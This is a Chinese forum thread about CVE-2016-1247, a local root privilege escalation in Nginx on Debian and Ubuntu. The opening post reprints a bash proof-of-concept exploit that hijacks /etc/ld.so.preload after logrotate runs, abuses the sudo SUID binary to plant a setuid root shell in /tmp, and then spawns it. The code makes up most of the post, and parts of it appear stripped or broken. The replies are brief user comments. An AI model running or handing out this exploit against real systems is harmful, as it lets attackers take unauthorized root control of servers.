CVE

opelnic · 发表于 2016-12-5 10:48:47

本帖最后由 opelnic 于 2016-12-5 10:53 编辑

CVE-2016-1247：Debian、ubuntu发行版的Nginx本地提权漏洞

[ol]

CVSS分值: 7.2 [严重(HIGH)]

机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]

完整性影响: COMPLETE [系统完整性可被完全破坏]

可用性影响: COMPLETE [可能导致系统完全宕机]

攻击复杂度: LOW [漏洞利用没有访问限制 ]

攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]

身份认证: NONE [漏洞利用无需身份认证]

来源 http://cve.scap.org.cn/CVE-2016-1247.html

[/ol]复制代码

POC
[ol]

#!/bin/bash

#

# Nginx (Debian-based distros) - Root Privilege Escalation PoC Exploit

# nginxed-root.sh (ver. 1.0)

#

# CVE-2016-1247

#

# Discovered and coded by:

#

# Dawid Golunski

# dawid[at]legalhackers.com

#

# https://legalhackers.com

#

# Follow https://推特.com/dawid_golunski for updates on this advisory.

#

# ---

# This PoC exploit allows local attackers on Debian-based systems (Debian, Ubuntu

# etc.) to escalate their privileges from nginx web server user (www-data) to root

# through unsafe error log handling.

#

# The exploit waits for Nginx server to be restarted or receive a USR1 signal.

# On Debian-based systems the USR1 signal is sent by logrotate (/etc/logrotate.d/nginx)

# script which is called daily by the cron.daily on default installations.

# The restart should take place at 6:25am which is when cron.daily executes.

# Attackers can therefore get a root shell automatically in 24h at most without any admin

# interaction just by letting the exploit run till 6:25am assuming that daily logrotation

# has been configured.

#

# Exploit usage:

# ./nginxed-root.sh path_to_nginx_error.log

#

# To trigger logrotation for testing the exploit, you can run the following command:

#

# /usr/sbin/logrotate -vf /etc/logrotate.d/nginx

#

# See the full advisory for details at:

# https://legalhackers.com/advisories/Nginx-Exploit-Deb-Root-PrivEsc-CVE-2016-1247.html

#

# Video PoC:

# https://legalhackers.com/videos/Nginx-Exploit-Deb-Root-PrivEsc-CVE-2016-1247.html

#

# Disclaimer:

# For testing purposes only. Do no harm.

#

BACKDOORSH="/bin/bash"

BACKDOORPATH="/tmp/nginxrootsh"

PRIVESCLIB="/tmp/privesclib.so"

PRIVESCSRC="/tmp/privesclib.c"

SUIDBIN="/usr/bin/sudo"

function cleanexit {

# Cleanup

echo -e "\n[+] Cleaning up..."

rm -f $PRIVESCSRC

rm -f $PRIVESCLIB

rm -f $ERRORLOG

touch $ERRORLOG

if [ -f /etc/ld.so.preload ]; then

echo -n > /etc/ld.so.preload

fi

echo -e "\n[+] Job done. Exiting with code $1 \n"

exit $1

}

function ctrl_c() {

echo -e "\n[+] Ctrl+C pressed"

cleanexit 0

}

#intro

cat -------------------------------

\

\ __---__

_- /--______

__--( / \ )XXXXXXXXXXX\v.

.-XXX( O O )XXXXXXXXXXXXXXX-

/XXX( U ) XXXXXXX\

/XXXXX( )--_ XXXXXXXXXXX\

/XXXXX/ ( O ) XXXXXX \XXXXX\

XXXXX/ / XXXXXX \__ \XXXXX

XXXXXX__/ XXXXXX \__---->

---___ XXX__/ XXXXXX \__ /

\- --__/ ___/\ XXXXXX / ___--/=

\-\ ___/ XXXXXX '--- XXXXXX

\-\/XXX\ XXXXXX /XXXXX

\XXXXXXXXX \ /XXXXX/

\XXXXXX > _/XXXXX/

\XXXXX--__/ __-- XXXX/

-XXXXXXXX--------------- XXXXXX-

\XXXXXXXXXXXXXXXXXXXXXXXXXX/

""VXXXXXXXXXXXXXXXXXXV""

_eascii_

echo -e "\033[94m \nNginx (Debian-based distros) - Root Privilege Escalation PoC Exploit (CVE-2016-1247) \nnginxed-root.sh (ver. 1.0)\n"

echo -e "Discovered and coded by: \n\nDawid Golunski \nhttps://legalhackers.com \033[0m"

# Args

if [ $# -lt 1 ]; then

echo -e "\n[!] Exploit usage: \n\n$0 path_to_error.log \n"

echo -e "It seems that this server uses: `ps aux | grep nginx | awk -F'log-error=' '{ print $2 }' | cut -d' ' -f1 | grep '/'`\n"

exit 3

fi

# Priv check

echo -e "\n[+] Starting the exploit as: \n\033[94m`id`\033[0m"

id | grep -q www-data

if [ $? -ne 0 ]; then

echo -e "\n[!] You need to execute the exploit as www-data user! Exiting.\n"

exit 3

fi

# Set target paths

ERRORLOG="$1"

if [ ! -f $ERRORLOG ]; then

echo -e "\n[!] The specified Nginx error log ($ERRORLOG) doesn't exist. Try again.\n"

exit 3

fi

# [ Exploitation ]

trap ctrl_c INT

# Compile privesc preload library

echo -e "\n[+] Compiling the privesc shared library ($PRIVESCSRC)"

cat /dev/null 2>/dev/null

# Wait for Nginx to re-open the logs/USR1 signal after the logrotation (if daily

# rotation is enable in logrotate config for nginx, this should happen within 24h at 6:25am)

echo -ne "\n[+] Waiting for Nginx service to be restarted (-USR1) by logrotate called from cron.daily at 6:25am..."

while :; do

sleep 1

if [ -f /etc/ld.so.preload ]; then

echo $PRIVESCLIB > /etc/ld.so.preload

rm -f $ERRORLOG

break;

fi

done

# /etc/ld.so.preload should be owned by www-data user at this point

# Inject the privesc.so shared library to escalate privileges

echo $PRIVESCLIB > /etc/ld.so.preload

echo -e "\n[+] Nginx restarted. The /etc/ld.so.preload file got created with web server privileges: \n`ls -l /etc/ld.so.preload`"

echo -e "\n[+] Adding $PRIVESCLIB shared lib to /etc/ld.so.preload"

echo -e "\n[+] The /etc/ld.so.preload file now contains: \n`cat /etc/ld.so.preload`"

chmod 755 /etc/ld.so.preload

# Escalating privileges via the SUID binary (e.g. /usr/bin/sudo)

echo -e "\n[+] Escalating privileges via the $SUIDBIN SUID binary to get root!"

sudo 2>/dev/null >/dev/null

# Check for the rootshell

ls -l $BACKDOORPATH

ls -l $BACKDOORPATH | grep rws | grep -q root

if [ $? -eq 0 ]; then

echo -e "\n[+] Rootshell got assigned root SUID perms at: \n`ls -l $BACKDOORPATH`"

echo -e "\n\033[94mThe server is (N)jinxed ! ;) Got root via Nginx!\033[0m"

else

echo -e "\n[!] Failed to get root"

cleanexit 2

fi

rm -f $ERRORLOG

echo > $ERRORLOG

# Use the rootshell to perform cleanup that requires root privilges

$BACKDOORPATH -p -c "rm -f /etc/ld.so.preload; rm -f $PRIVESCLIB"

# Reset the logging to error.log

$BACKDOORPATH -p -c "kill -USR1 `pidof -s nginx`"

# Execute the rootshell

echo -e "\n[+] Spawning the rootshell $BACKDOORPATH now! \n"

$BACKDOORPATH -p -i

# Job done.

cleanexit 0

[/ol]复制代码

Vicer · 发表于 2016-12-5 11:02:41

已阅不用客气

用户名 · 发表于 2016-12-5 11:04:52

只会用落后的CENTOS

Meeleem · 发表于 2016-12-5 11:06:24

表示一向用nginx官方的源安装nginx包而不是发行版的源。。无压力

另外本地提权其实。。影响力有限吧

左手写爱 · 发表于 2016-12-5 13:00:53

Centos路过

		自动登录	找回密码
密码			立即注册